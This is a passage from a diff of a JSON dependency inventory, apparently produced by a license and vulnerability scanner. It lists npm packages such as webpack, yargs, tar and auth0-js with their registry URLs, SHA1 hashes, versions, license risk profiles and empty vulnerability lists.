"NODE_PACKAGED_MODULE", + "languages": "javascript/Node.js", + "references": { + "url": "https://registry.npmjs.org/ast-types/-/ast-types-0.11.5.tgz", + "homePage": "http://github.com/benjamn/ast-types", + "genericPackageIndex": "https://www.npmjs.org/package/ast-types" + }, + "matchType": "SHA1", + "sha1": "9890825d660c03c28339f315e9fa0a360e31ec28", + "name": "ast-types-0.11.5.tgz", + "artifactId": "ast-types-0.11.5.tgz", + "version": "0.11.5", + "groupId": "ast-types", + "licenses": [ + { + "name": "MIT", + "url": "http://www.opensource.org/licenses/MIT", + "profileInfo": { + "copyrightRiskScore": "THREE", + "patentRiskScore": "ONE", + "copyleft": "NO", + "royaltyFree": "YES" + }, + "referenceType": "NPM (details available in Node Package Manager)", + "reference": "https://www.npmjs.com/package/ast-types" + } + ], + "vulnerabilities": [], + "customAttributeValues": [] + }, + { + "keyUuid": "06ba7a05-1fcd-492d-b771-d6574a5ef0d2", + "keyId": 27287314, + "type": "NODE_PACKAGED_MODULE", + "languages": "javascript/Node.js", + "references": { + "url": "https://registry.npmjs.org/css-blank-pseudo/-/css-blank-pseudo-0.1.4.tgz", + "homePage": "https://github.com/csstools/css-blank-pseudo#readme", + "genericPackageIndex": "https://www.npmjs.org/package/css-blank-pseudo" + }, + "matchType": "SHA1", + "sha1": "dfdefd3254bf8a82027993674ccf35483bfcb3c5", + "name": "css-blank-pseudo-0.1.4.tgz", + "artifactId": "css-blank-pseudo-0.1.4.tgz", + "version": "0.1.4", + "groupId": "css-blank-pseudo", + "licenses": [ + { + "name": "CC0", + "url": "http://creativecommons.org/publicdomain/zero/1.0/legalcode", + "profileInfo": {}, + "referenceType": "NPM (details available in Node Package Manager)", + "reference": "https://www.npmjs.com/package/css-blank-pseudo" + } + ], + "vulnerabilities": [], + "customAttributeValues": [] + }, + { + "keyUuid": "27493345-728d-4dd0-b330-d810f3e9119d", + "keyId": 27790207, + "type": "NODE_PACKAGED_MODULE", + "languages": "javascript/Node.js", + "references": { + "url": "https://registry.npmjs.org/postcss-custom-properties/-/postcss-custom-properties-8.0.11.tgz", + "homePage": "https://github.com/postcss/postcss-custom-properties#readme", + "genericPackageIndex": "https://www.npmjs.org/package/postcss-custom-properties" + }, + "matchType": "SHA1", + "sha1": "2d61772d6e92f22f5e0d52602df8fae46fa30d97", + "name": "postcss-custom-properties-8.0.11.tgz", + "artifactId": "postcss-custom-properties-8.0.11.tgz", + "version": "8.0.11", + "groupId": "postcss-custom-properties", + "licenses": [ + { + "name": "MIT", + "url": "http://www.opensource.org/licenses/MIT", + "profileInfo": { + "copyrightRiskScore": "THREE", + "patentRiskScore": "ONE", + "copyleft": "NO", + "royaltyFree": "YES" + }, + "referenceType": "NPM (details available in Node Package Manager)", + "reference": "https://index.whitesourcesoftware.com/gri/app/reader/resource/content/asString/ef128f1a-166a-4995-93b7-8173eb08f989" + } + ], + "vulnerabilities": [], + "customAttributeValues": [] + }, + { + "keyUuid": "123444f6-4ca9-44bb-a46b-66ab357d9b6a", + "keyId": 28432194, + "type": "NODE_PACKAGED_MODULE", + "languages": "javascript/Node.js", + "references": { + "url": "https://registry.npmjs.org/to-ast/-/to-ast-1.0.0.tgz", + "homePage": "https://github.com/devongovett/to-ast", + "genericPackageIndex": "https://www.npmjs.org/package/to-ast" + }, + "matchType": "SHA1", + "sha1": "0c4a31c8c98edfde9aaf0192c794b4c8b11ee287", + "name": "to-ast-1.0.0.tgz", + "artifactId": "to-ast-1.0.0.tgz", + "version": "1.0.0", + "groupId": "to-ast", + "licenses": [ + { + "name": "MIT", + "url": "http://www.opensource.org/licenses/MIT", + "profileInfo": { + "copyrightRiskScore": "THREE", + "patentRiskScore": "ONE", + "copyleft": "NO", + "royaltyFree": "YES" + }, + "referenceType": "NPM (details available in Node Package Manager)", + "reference": "https://www.npmjs.com/package/to-ast" + } + ], + "vulnerabilities": [], + "customAttributeValues": [] + }, + { + "keyUuid": "d1e6c7d4-3420-4915-be0d-ad2999598356", + "keyId": 28375689, + "type": "NODE_PACKAGED_MODULE", + "languages": "javascript/Node.js", + "references": { + "url": "https://registry.npmjs.org/commander/-/commander-2.20.3.tgz", + "homePage": "https://github.com/tj/commander.js#readme", + "genericPackageIndex": "https://www.npmjs.org/package/commander" + }, + "matchType": "SHA1", + "sha1": "fd485e84c03eb4881c20722ba48035e8531aeb33", + "name": "commander-2.20.3.tgz", + "artifactId": "commander-2.20.3.tgz", + "version": "2.20.3", + "groupId": "commander", + "licenses": [ + { + "name": "MIT", + "url": "http://www.opensource.org/licenses/MIT", + "profileInfo": { + "copyrightRiskScore": "THREE", + "patentRiskScore": "ONE", + "copyleft": "NO", + "royaltyFree": "YES" + }, + "referenceType": "NPM (details available in Node Package Manager)", + "reference": "https://index.whitesourcesoftware.com/gri/app/reader/resource/content/asString/788f197a-8d5d-4678-9ce9-3b69e979bf30" + } + ], + "vulnerabilities": [], + "customAttributeValues": [] + }, + { + "keyUuid": "5d30fc57-2824-487a-bdfe-1c4d18263a9f", + "keyId": 26967880, + "type": "NODE_PACKAGED_MODULE", + "languages": "javascript/Node.js", + "references": { + "url": "https://registry.npmjs.org/os-shim/-/os-shim-0.1.3.tgz", + "homePage": "http://github.com/h2non/node-os-shim", + "genericPackageIndex": "https://www.npmjs.org/package/os-shim" + }, + "matchType": "SHA1", + "sha1": "6b62c3791cf7909ea35ed46e17658bb417cb3917", + "name": "os-shim-0.1.3.tgz", + "artifactId": "os-shim-0.1.3.tgz", + "version": "0.1.3", + "groupId": "os-shim", + "licenses": [ + { + "name": "MIT", + "url": "http://www.opensource.org/licenses/MIT", + "profileInfo": { + "copyrightRiskScore": "THREE", + "patentRiskScore": "ONE", + "copyleft": "NO", + "royaltyFree": "YES" + }, + "referenceType": "NPM (details available in Node Package Manager)", + "reference": "https://index.whitesourcesoftware.com/gri/app/reader/resource/content/asString/2fc28b1c-d494-4255-b1f8-946f512871ea" + } + ], + "vulnerabilities": [], + "customAttributeValues": [] + }, + { + "keyUuid": "22d17c94-cdeb-46e0-b96a-415bb0887fa5", + "keyId": 26963126, + "type": "NODE_PACKAGED_MODULE", + "languages": "javascript/Node.js", + "references": { + "url": "https://registry.npmjs.org/fecha/-/fecha-2.3.3.tgz", + "homePage": "https://github.com/taylorhakes/fecha", + "genericPackageIndex": "https://www.npmjs.org/package/fecha" + }, + "matchType": "SHA1", + "sha1": "948e74157df1a32fd1b12c3a3c3cdcb6ec9d96cd", + "name": "fecha-2.3.3.tgz", + "artifactId": "fecha-2.3.3.tgz", + "version": "2.3.3", + "groupId": "fecha", + "licenses": [ + { + "name": "MIT", + "url": "http://www.opensource.org/licenses/MIT", + "profileInfo": { + "copyrightRiskScore": "THREE", + "patentRiskScore": "ONE", + "copyleft": "NO", + "royaltyFree": "YES" + }, + "referenceType": "NPM (details available in Node Package Manager)", + "reference": "https://www.npmjs.com/package/fecha" + } + ], + "vulnerabilities": [], + "customAttributeValues": [] + }, + { + "keyUuid": "1de11390-5bd8-45d6-8f2a-66ab1a61d1e0", + "keyId": 27100384, + "type": "NODE_PACKAGED_MODULE", + "languages": "javascript/Node.js", + "references": { + "url": "https://registry.npmjs.org/postcss-pseudo-class-any-link/-/postcss-pseudo-class-any-link-6.0.0.tgz", + "homePage": "https://github.com/jonathantneal/postcss-pseudo-class-any-link#readme", + "genericPackageIndex": "https://www.npmjs.org/package/postcss-pseudo-class-any-link" + }, + "matchType": "SHA1", + "sha1": "2ed3eed393b3702879dec4a87032b210daeb04d1", + "name": "postcss-pseudo-class-any-link-6.0.0.tgz", + "artifactId": "postcss-pseudo-class-any-link-6.0.0.tgz", + "version": "6.0.0", + "groupId": "postcss-pseudo-class-any-link", + "licenses": [ + { + "name": "CC0", + "url": "http://creativecommons.org/publicdomain/zero/1.0/legalcode", + "profileInfo": {}, + "referenceType": "NPM (details available in Node Package Manager)", + "reference": "https://index.whitesourcesoftware.com/gri/app/reader/resource/content/asString/6e2b238f-014e-4b58-a820-57faaf5e5b82" + } + ], + "vulnerabilities": [], + "customAttributeValues": [] + }, + { + "keyUuid": "4a1b0182-12d3-462c-b35b-2e7b95454587", + "keyId": 26963128, + "type": "NODE_PACKAGED_MODULE", + "languages": "javascript/Node.js", + "references": { + "url": "https://registry.npmjs.org/color/-/color-3.0.0.tgz", + "homePage": "https://github.com/Qix-/color#readme", + "genericPackageIndex": "https://www.npmjs.org/package/color" + }, + "matchType": "SHA1", + "sha1": "d920b4328d534a3ac8295d68f7bd4ba6c427be9a", + "name": "color-3.0.0.tgz", + "artifactId": "color-3.0.0.tgz", + "version": "3.0.0", + "groupId": "color", + "licenses": [ + { + "name": "MIT", + "url": "http://www.opensource.org/licenses/MIT", + "profileInfo": { + "copyrightRiskScore": "THREE", + "patentRiskScore": "ONE", + "copyleft": "NO", + "royaltyFree": "YES" + }, + "referenceType": "NPM (details available in Node Package Manager)", + "reference": "https://www.npmjs.com/package/color" + } + ], + "vulnerabilities": [], + "customAttributeValues": [] + }, + { + "keyUuid": "f4742ef5-b025-42dd-9bbc-9f81045b2a95", + "keyId": 27798175, + "type": "NODE_PACKAGED_MODULE", + "languages": "javascript/Node.js", + "references": { + "url": "https://registry.npmjs.org/yargs/-/yargs-13.3.0.tgz", + "homePage": "https://yargs.js.org/", + "genericPackageIndex": "https://www.npmjs.org/package/yargs" + }, + "matchType": "SHA1", + "sha1": "4c657a55e07e5f2cf947f8a366567c04a0dedc83", + "name": "yargs-13.3.0.tgz", + "artifactId": "yargs-13.3.0.tgz", + "version": "13.3.0", + "groupId": "yargs", + "licenses": [ + { + "name": "MIT", + "url": "http://www.opensource.org/licenses/MIT", + "profileInfo": { + "copyrightRiskScore": "THREE", + "patentRiskScore": "ONE", + "copyleft": "NO", + "royaltyFree": "YES" + }, + "referenceType": "NPM (details available in Node Package Manager)", + "reference": "https://www.npmjs.com/package/yargs" + } + ], + "vulnerabilities": [], + "customAttributeValues": [] + }, + { + "keyUuid": "b1c6077c-09b8-48fe-810d-3d2d1c23754d", + "keyId": 26948374, + "type": "NODE_PACKAGED_MODULE", + "languages": "javascript/Node.js", + "references": { + "url": "https://registry.npmjs.org/traverse/-/traverse-0.6.6.tgz", + "homePage": "https://github.com/substack/js-traverse", + "genericPackageIndex": "https://www.npmjs.org/package/traverse" + }, + "matchType": "SHA1", + "sha1": "cbdf560fd7b9af632502fed40f918c157ea97137", + "name": "traverse-0.6.6.tgz", + "artifactId": "traverse-0.6.6.tgz", + "version": "0.6.6", + "groupId": "traverse", + "licenses": [ + { + "name": "MIT", + "url": "http://www.opensource.org/licenses/MIT", + "profileInfo": { + "copyrightRiskScore": "THREE", + "patentRiskScore": "ONE", + "copyleft": "NO", + "royaltyFree": "YES" + }, + "referenceType": "NPM (details available in Node Package Manager)", + "reference": "https://www.npmjs.com/package/traverse/v/0.6.6" + } + ], + "vulnerabilities": [], + "customAttributeValues": [] + }, + { + "keyUuid": "981f3f3b-8d36-4e28-90bd-735c51c5a4dd", + "keyId": 27216126, + "type": "NODE_PACKAGED_MODULE", + "languages": "javascript/Node.js", + "references": { + "url": "https://registry.npmjs.org/on-headers/-/on-headers-1.0.2.tgz", + "homePage": "https://github.com/jshttp/on-headers#readme", + "genericPackageIndex": "https://www.npmjs.org/package/on-headers" + }, + "matchType": "SHA1", + "sha1": "772b0ae6aaa525c399e489adfad90c403eb3c28f", + "name": "on-headers-1.0.2.tgz", + "artifactId": "on-headers-1.0.2.tgz", + "version": "1.0.2", + "groupId": "on-headers", + "licenses": [ + { + "name": "MIT", + "url": "http://www.opensource.org/licenses/MIT", + "profileInfo": { + "copyrightRiskScore": "THREE", + "patentRiskScore": "ONE", + "copyleft": "NO", + "royaltyFree": "YES" + }, + "referenceType": "NPM (details available in Node Package Manager)", + "reference": "https://index.whitesourcesoftware.com/gri/app/reader/resource/content/asString/f55a77cb-2cc3-4c75-bf59-92534bf12e18" + } + ], + "vulnerabilities": [], + "customAttributeValues": [] + }, + { + "keyUuid": "1b78be8f-dd4d-4817-8bff-7df06b810fe9", + "keyId": 28432181, + "type": "NODE_PACKAGED_MODULE", + "languages": "javascript/Node.js", + "references": { + "url": "https://registry.npmjs.org/uc-first-array/-/uc-first-array-1.1.9.tgz", + "homePage": "https://github.com/IonicaBizau/uc-first-array#readme", + "genericPackageIndex": "https://www.npmjs.org/package/uc-first-array" + }, + "matchType": "SHA1", + "sha1": "db3cb57f118bdba7f24f4fd9d3615c11ea4bf266", + "name": "uc-first-array-1.1.9.tgz", + "artifactId": "uc-first-array-1.1.9.tgz", + "version": "1.1.9", + "groupId": "uc-first-array", + "licenses": [ + { + "name": "MIT", + "url": "http://www.opensource.org/licenses/MIT", + "profileInfo": { + "copyrightRiskScore": "THREE", + "patentRiskScore": "ONE", + "copyleft": "NO", + "royaltyFree": "YES" + }, + "referenceType": "NPM (details available in Node Package Manager)", + "reference": "https://index.whitesourcesoftware.com/gri/app/reader/resource/content/asString/0487e4a7-979f-46d0-8542-67da14388ccd" + } + ], + "vulnerabilities": [], + "customAttributeValues": [] + }, + { + "keyUuid": "e0eb602c-df05-4526-b198-dc82f7d832fc", + "keyId": 27881635, + "type": "NODE_PACKAGED_MODULE", + "languages": "javascript/Node.js", + "references": { + "url": "https://registry.npmjs.org/webpack/-/webpack-4.39.0.tgz", + "homePage": "https://github.com/webpack/webpack", + "genericPackageIndex": "https://www.npmjs.org/package/webpack" + }, + "matchType": "SHA1", + "sha1": "1d511308c3dd8f9fe3152c9447ce30f1814a620c", + "name": "webpack-4.39.0.tgz", + "artifactId": "webpack-4.39.0.tgz", + "version": "4.39.0", + "groupId": "webpack", + "licenses": [ + { + "name": "MIT", + "url": "http://www.opensource.org/licenses/MIT", + "profileInfo": { + "copyrightRiskScore": "THREE", + "patentRiskScore": "ONE", + "copyleft": "NO", + "royaltyFree": "YES" + }, + "referenceType": "NPM (details available in Node Package Manager)", + "reference": "https://www.npmjs.com/package/webpack" + } + ], + "vulnerabilities": [], + "customAttributeValues": [] + }, + { + "keyUuid": "70b1da4d-f3c4-4097-9f98-249817dc27a9", + "keyId": 28432195, + "type": "NODE_PACKAGED_MODULE", + "languages": "javascript/Node.js", + "references": { + "url": "https://registry.npmjs.org/cli-cursor/-/cli-cursor-2.0.0.tgz", + "homePage": "https://github.com/sindresorhus/cli-cursor#readme", + "genericPackageIndex": "https://www.npmjs.org/package/cli-cursor" + }, + "matchType": "SHA1", + "sha1": "f4c77840ecb2bed38c2672df39e264d54a0c1148", + "name": "cli-cursor-2.0.0.tgz", + "artifactId": "cli-cursor-2.0.0.tgz", + "version": "2.0.0", + "groupId": "cli-cursor", + "licenses": [ + { + "name": "MIT", + "url": "http://www.opensource.org/licenses/MIT", + "profileInfo": { + "copyrightRiskScore": "THREE", + "patentRiskScore": "ONE", + "copyleft": "NO", + "royaltyFree": "YES" + }, + "referenceType": "NPM (details available in Node Package Manager)", + "reference": "https://www.npmjs.com/package/cli-cursor" + } + ], + "vulnerabilities": [], + "customAttributeValues": [] + }, + { + "keyUuid": "2b96e06d-0cdf-471a-86cb-2acb9d0403d4", + "keyId": 28272932, + "type": "NODE_PACKAGED_MODULE", + "languages": "javascript/Node.js", + "references": { + "url": "https://registry.npmjs.org/mime-db/-/mime-db-1.42.0.tgz", + "homePage": "https://github.com/jshttp/mime-db#readme", + "genericPackageIndex": "https://www.npmjs.org/package/mime-db" + }, + "matchType": "SHA1", + "sha1": "3e252907b4c7adb906597b4b65636272cf9e7bac", + "name": "mime-db-1.42.0.tgz", + "artifactId": "mime-db-1.42.0.tgz", + "version": "1.42.0", + "groupId": "mime-db", + "licenses": [ + { + "name": "MIT", + "url": "http://www.opensource.org/licenses/MIT", + "profileInfo": { + "copyrightRiskScore": "THREE", + "patentRiskScore": "ONE", + "copyleft": "NO", + "royaltyFree": "YES" + }, + "referenceType": "NPM (details available in Node Package Manager)", + "reference": "https://index.whitesourcesoftware.com/gri/app/reader/resource/content/asString/51132572-30ac-436c-9b2d-6e90dd57180a" + } + ], + "vulnerabilities": [], + "customAttributeValues": [] + }, + { + "keyUuid": "b3fad68a-b59d-42d5-a09d-6c0f03132ebe", + "keyId": 26955224, + "type": "NODE_PACKAGED_MODULE", + "languages": "javascript/Node.js", + "references": { + "url": "https://registry.npmjs.org/execa/-/execa-0.10.0.tgz", + "homePage": "https://github.com/sindresorhus/execa#readme", + "genericPackageIndex": "https://www.npmjs.org/package/execa" + }, + "matchType": "SHA1", + "sha1": "ff456a8f53f90f8eccc71a96d11bdfc7f082cb50", + "name": "execa-0.10.0.tgz", + "artifactId": "execa-0.10.0.tgz", + "version": "0.10.0", + "groupId": "execa", + "licenses": [ + { + "name": "MIT", + "url": "http://www.opensource.org/licenses/MIT", + "profileInfo": { + "copyrightRiskScore": "THREE", + "patentRiskScore": "ONE", + "copyleft": "NO", + "royaltyFree": "YES" + }, + "referenceType": "NPM (details available in Node Package Manager)", + "reference": "https://index.whitesourcesoftware.com/gri/app/reader/resource/content/asString/a1e5d87f-99db-4e4d-af25-d0375dd6834e" + } + ], + "vulnerabilities": [], + "customAttributeValues": [] + }, + { + "keyUuid": "e05f68f2-9258-4648-a632-cb60dce75e00", + "keyId": 27287344, + "type": "NODE_PACKAGED_MODULE", + "languages": "javascript/Node.js", + "references": { + "url": "https://registry.npmjs.org/cssdb/-/cssdb-4.4.0.tgz", + "homePage": "https://github.com/csstools/cssdb#readme", + "genericPackageIndex": "https://www.npmjs.org/package/cssdb" + }, + "matchType": "SHA1", + "sha1": "3bf2f2a68c10f5c6a08abd92378331ee803cddb0", + "name": "cssdb-4.4.0.tgz", + "artifactId": "cssdb-4.4.0.tgz", + "version": "4.4.0", + "groupId": "cssdb", + "licenses": [ + { + "name": "CC0", + "url": "http://creativecommons.org/publicdomain/zero/1.0/legalcode", + "profileInfo": {}, + "referenceType": "NPM (details available in Node Package Manager)", + "reference": "https://www.npmjs.com/package/cssdb" + } + ], + "vulnerabilities": [], + "customAttributeValues": [] + }, + { + "keyUuid": "35cd9d18-6f2e-4f88-ac99-a26ab71ba28d", + "keyId": 28432201, + "type": "NODE_PACKAGED_MODULE", + "languages": "javascript/Node.js", + "references": { + "url": "https://registry.npmjs.org/http-error/-/http-error-0.0.6.tgz", + "homePage": "https://github.com/c9/node-http-error#readme", + "genericPackageIndex": "https://www.npmjs.org/package/http-error" + }, + "matchType": "SHA1", + "sha1": "bff309b0bdafe30d95fbb73ac2dd2bdd39bbc074", + "name": "http-error-0.0.6.tgz", + "artifactId": "http-error-0.0.6.tgz", + "version": "0.0.6", + "groupId": "http-error", + "licenses": [ + { + "name": "MIT", + "url": "http://www.opensource.org/licenses/MIT", + "profileInfo": { + "copyrightRiskScore": "THREE", + "patentRiskScore": "ONE", + "copyleft": "NO", + "royaltyFree": "YES" + }, + "referenceType": "NPM (details available in Node Package Manager)", + "reference": "http://github.com/c9/node-http-error/raw/master/LICENSE" + } + ], + "vulnerabilities": [], + "customAttributeValues": [] + }, + { + "keyUuid": "37f27a70-98ac-4cdc-ab1f-c88a1cd66582", + "keyId": 27100420, + "type": "NODE_PACKAGED_MODULE", + "languages": "javascript/Node.js", + "references": { + "url": "https://registry.npmjs.org/@csstools/convert-colors/-/convert-colors-1.4.0.tgz", + "homePage": "https://github.com/jonathantneal/convert-colors#readme", + "genericPackageIndex": "https://www.npmjs.org/package/@csstools/convert-colors" + }, + "matchType": "SHA1", + "sha1": "ad495dc41b12e75d588c6db8b9834f08fa131eb7", + "name": "convert-colors-1.4.0.tgz", + "artifactId": "convert-colors-1.4.0.tgz", + "version": "1.4.0", + "groupId": "@csstools/convert-colors", + "licenses": [ + { + "name": "CC0", + "url": "http://creativecommons.org/publicdomain/zero/1.0/legalcode", + "profileInfo": {}, + "referenceType": "NPM (details available in Node Package Manager)", + "reference": "https://www.npmjs.com/package/@csstools/convert-colors" + } + ], + "vulnerabilities": [], + "customAttributeValues": [] + }, + { + "keyUuid": "46a81195-a844-4f89-952c-817105bef22b", + "keyId": 27100475, + "type": "NODE_PACKAGED_MODULE", + "languages": "javascript/Node.js", + "references": { + "url": "https://registry.npmjs.org/postcss-replace-overflow-wrap/-/postcss-replace-overflow-wrap-3.0.0.tgz", + "homePage": "https://github.com/MattDiMu/postcss-replace-overflow-wrap", + "genericPackageIndex": "https://www.npmjs.org/package/postcss-replace-overflow-wrap" + }, + "matchType": "SHA1", + "sha1": "61b360ffdaedca84c7c918d2b0f0d0ea559ab01c", + "name": "postcss-replace-overflow-wrap-3.0.0.tgz", + "artifactId": "postcss-replace-overflow-wrap-3.0.0.tgz", + "version": "3.0.0", + "groupId": "postcss-replace-overflow-wrap", + "licenses": [ + { + "name": "MIT", + "url": "http://www.opensource.org/licenses/MIT", + "profileInfo": { + "copyrightRiskScore": "THREE", + "patentRiskScore": "ONE", + "copyleft": "NO", + "royaltyFree": "YES" + }, + "referenceType": "NPM (details available in Node Package Manager)", + "reference": "https://index.whitesourcesoftware.com/gri/app/reader/resource/content/asString/92721d50-7a91-4088-9978-84fe04f5c69f" + } + ], + "vulnerabilities": [], + "customAttributeValues": [] + }, + { + "keyUuid": "d2713f53-46d8-43ef-9f5f-261e079e05f1", + "keyId": 26966806, + "type": "NODE_PACKAGED_MODULE", + "languages": "javascript/Node.js", + "references": { + "url": "https://registry.npmjs.org/p-defer/-/p-defer-1.0.0.tgz", + "homePage": "https://github.com/sindresorhus/p-defer#readme", + "genericPackageIndex": "https://www.npmjs.org/package/p-defer" + }, + "matchType": "SHA1", + "sha1": "9f6eb182f6c9aa8cd743004a7d4f96b196b0fb0c", + "name": "p-defer-1.0.0.tgz", + "artifactId": "p-defer-1.0.0.tgz", + "version": "1.0.0", + "groupId": "p-defer", + "licenses": [ + { + "name": "MIT", + "url": "http://www.opensource.org/licenses/MIT", + "profileInfo": { + "copyrightRiskScore": "THREE", + "patentRiskScore": "ONE", + "copyleft": "NO", + "royaltyFree": "YES" + }, + "referenceType": "NPM (details available in Node Package Manager)", + "reference": "https://index.whitesourcesoftware.com/gri/app/reader/resource/content/asString/4409b2b3-6618-468b-b762-18d737110102" + } + ], + "vulnerabilities": [], + "customAttributeValues": [] + }, + { + "keyUuid": "1f2ec576-c110-4287-b219-dc22c40fc0c5", + "keyId": 27287327, + "type": "NODE_PACKAGED_MODULE", + "languages": "javascript/Node.js", + "references": { + "url": "https://registry.npmjs.org/postcss-color-gray/-/postcss-color-gray-5.0.0.tgz", + "homePage": "https://github.com/postcss/postcss-color-gray#readme", + "genericPackageIndex": "https://www.npmjs.org/package/postcss-color-gray" + }, + "matchType": "SHA1", + "sha1": "532a31eb909f8da898ceffe296fdc1f864be8547", + "name": "postcss-color-gray-5.0.0.tgz", + "artifactId": "postcss-color-gray-5.0.0.tgz", + "version": "5.0.0", + "groupId": "postcss-color-gray", + "licenses": [ + { + "name": "ISC", + "url": "http://www.opensource.org/licenses/ISC", + "profileInfo": { + "copyrightRiskScore": "THREE", + "patentRiskScore": "THREE", + "copyleft": "NO", + "linking": "NON_VIRAL", + "royaltyFree": "NO" + }, + "referenceType": "NPM (details available in Node Package Manager)", + "reference": "https://www.npmjs.com/package/postcss-color-gray/v/5.0.0" + } + ], + "vulnerabilities": [], + "customAttributeValues": [] + }, + { + "keyUuid": "5c150361-df4d-432d-bdf8-00491f4b12a8", + "keyId": 28240904, + "type": "NODE_PACKAGED_MODULE", + "languages": "javascript/Node.js", + "references": { + "url": "https://registry.npmjs.org/auth0-js/-/auth0-js-9.11.3.tgz", + "homePage": "https://github.com/auth0/auth0.js#readme", + "genericPackageIndex": "https://www.npmjs.org/package/auth0-js" + }, + "matchType": "SHA1", + "sha1": "a19add9f5c47d155b7a6f87a6dd2b197a9a43860", + "name": "auth0-js-9.11.3.tgz", + "artifactId": "auth0-js-9.11.3.tgz", + "version": "9.11.3", + "groupId": "auth0-js", + "licenses": [ + { + "name": "MIT", + "url": "http://www.opensource.org/licenses/MIT", + "profileInfo": { + "copyrightRiskScore": "THREE", + "patentRiskScore": "ONE", + "copyleft": "NO", + "royaltyFree": "YES" + }, + "referenceType": "NPM (details available in Node Package Manager)", + "reference": "https://index.whitesourcesoftware.com/gri/app/reader/resource/content/asString/2c773895-ab61-4171-9521-6ccc03d0a060" + } + ], + "vulnerabilities": [], + "customAttributeValues": [] + }, + { + "keyUuid": "b7bc6023-83cd-4f0b-af09-0facfc80d4f5", + "keyId": 28432198, + "type": "NODE_PACKAGED_MODULE", + "languages": "javascript/Node.js", + "references": { + "url": "https://registry.npmjs.org/@test/honeyui-form/-/honeyui-form-1.1.1.tgz", + "homePage": "https://github.com/test/honeyui/tree/master/packages/form#readme", + "genericPackageIndex": "https://www.npmjs.org/package/@test/honeyui-form" + }, + "matchType": "SHA1", + "sha1": "17a847510d322670b4760af6d09ecf68e8355c02", + "name": "honeyui-form-1.1.1.tgz", + "artifactId": "honeyui-form-1.1.1.tgz", + "version": "1.1.1", + "groupId": "@test/honeyui-form", + "licenses": [], + "vulnerabilities": [], + "customAttributeValues": [] + }, + { + "keyUuid": "3e75ad83-0591-446b-a931-c9449f951e75", + "keyId": 27510528, + "type": "NODE_PACKAGED_MODULE", + "languages": "javascript/Node.js", + "references": { + "url": "https://registry.npmjs.org/react-error-overlay/-/react-error-overlay-5.1.6.tgz", + "homePage": "https://github.com/facebook/create-react-app#readme", + "genericPackageIndex": "https://www.npmjs.org/package/react-error-overlay" + }, + "matchType": "SHA1", + "sha1": "0cd73407c5d141f9638ae1e0c63e7b2bf7e9929d", + "name": "react-error-overlay-5.1.6.tgz", + "artifactId": "react-error-overlay-5.1.6.tgz", + "version": "5.1.6", + "groupId": "react-error-overlay", + "licenses": [ + { + "name": "MIT", + "url": "http://www.opensource.org/licenses/MIT", + "profileInfo": { + "copyrightRiskScore": "THREE", + "patentRiskScore": "ONE", + "copyleft": "NO", + "royaltyFree": "YES" + }, + "referenceType": "NPM (details available in Node Package Manager)", + "reference": "https://index.whitesourcesoftware.com/gri/app/reader/resource/content/asString/f8597933-f12f-4097-8730-8b0d2b9d4bf6" + } + ], + "vulnerabilities": [], + "customAttributeValues": [] + }, + { + "keyUuid": "396d7bcb-6fd5-40f9-9e5b-e9c8c2a5fb20", + "keyId": 28248669, + "type": "NODE_PACKAGED_MODULE", + "languages": "javascript/Node.js", + "references": { + "url": "https://registry.npmjs.org/tar/-/tar-4.4.13.tgz", + "homePage": "https://github.com/npm/node-tar#readme", + "genericPackageIndex": "https://www.npmjs.org/package/tar" + }, + "matchType": "SHA1", + "sha1": "43b364bc52888d555298637b10d60790254ab525", + "name": "tar-4.4.13.tgz", + "artifactId": "tar-4.4.13.tgz", + "version": "4.4.13", + "groupId": "tar", + "licenses": [ + { + "name": "ISC", + "url": "http://www.opensource.org/licenses/ISC", + "profileInfo": { + "copyrightRiskScore": "THREE", + "patentRiskScore": "THREE", + "copyleft": "NO", + "linking": "NON_VIRAL", + "royaltyFree": "NO" + }, + "referenceType": "NPM (details available in Node Package Manager)", + "reference": "https://index.whitesourcesoftware.com/gri/app/reader/resource/content/asString/5060db6e-3a92-41ad-8c0c-b9dbbc2924b4" + } + ], + "vulnerabilities": [], + "customAttributeValues": [] + }, + { + "keyUuid": "c9939d57-af94-4c72-b8bc-8bf5cab96d7f", + "keyId": 28432147, + "type": "NODE_PACKAGED_MODULE", + "languages": "javascript/Node.js", + "references": { + "url": "https://registry.npmjs.org/@test/honeyui-spinner/-/honeyui-spinner-1.1.1.tgz", + "homePage": "https://github.com/test/honeyui/tree/master/packages/spinner#readme", + "genericPackageIndex": "https://www.npmjs.org/package/@test/honeyui-spinner" + }, + "matchType": "SHA1", + "sha1": "21c093f85ee6146a68c44a97edb83b85febb55e1", + "name": "honeyui-spinner-1.1.1.tgz", + "artifactId": "honeyui-spinner-1.1.1.tgz", + "version": "1.1.1", + "groupId": "@test/honeyui-spinner", + "licenses": [], + "vulnerabilities": [], + "customAttributeValues": [] + }, + { + "keyUuid": "2730172c-5978-4661-8503-032ae9ef736c", + "keyId": 28432168, + "type": "NODE_PACKAGED_MODULE", + "languages": "javascript/Node.js", + "references": { + "url": "https://registry.npmjs.org/lodash.trimstart/-/lodash.trimstart-4.5.1.tgz", + "homePage": "https://lodash.com/", + "genericPackageIndex": "https://www.npmjs.org/package/lodash.trimstart" + }, + "matchType": "SHA1", + "sha1": "8ff4dec532d82486af59573c39445914e944a7f1", + "name": "lodash.trimstart-4.5.1.tgz", + "artifactId": "lodash.trimstart-4.5.1.tgz", + "version": "4.5.1", + "groupId": "lodash.trimstart", + "licenses": [ + { + "name": "MIT", + "url": "http://www.opensource.org/licenses/MIT", + "profileInfo": { + "copyrightRiskScore": "THREE", + "patentRiskScore": "ONE", + "copyleft": "NO", + "royaltyFree": "YES" + }, + "referenceType": "NPM (details available in Node Package Manager)", + "reference": "https://index.whitesourcesoftware.com/gri/app/reader/resource/content/asString/7c2e5b7f-86c9-40aa-9f3c-376212069503" + } + ], + "vulnerabilities": [], + "customAttributeValues": [] + }, + { + "keyUuid": "80b89bee-d8a8-406c-b11f-c45a22006765", + "keyId": 27287309, + "type": "NODE_PACKAGED_MODULE", + "languages": "javascript/Node.js", + "references": { + "url": "https://registry.npmjs.org/get-caller-file/-/get-caller-file-2.0.5.tgz", + "homePage": "https://github.com/stefanpenner/get-caller-file#readme", + "genericPackageIndex": "https://www.npmjs.org/package/get-caller-file" + }, + "matchType": "SHA1", + "sha1": "4f94412a82db32f36e3b0b9741f8a97feb031f7e", + "name": "get-caller-file-2.0.5.tgz", + "artifactId": "get-caller-file-2.0.5.tgz", + "version": "2.0.5", + "groupId": "get-caller-file", + "licenses": [ + { + "name": "ISC", + "url": "http://www.opensource.org/licenses/ISC", + "profileInfo": { + "copyrightRiskScore": "THREE", + "patentRiskScore": "THREE", + 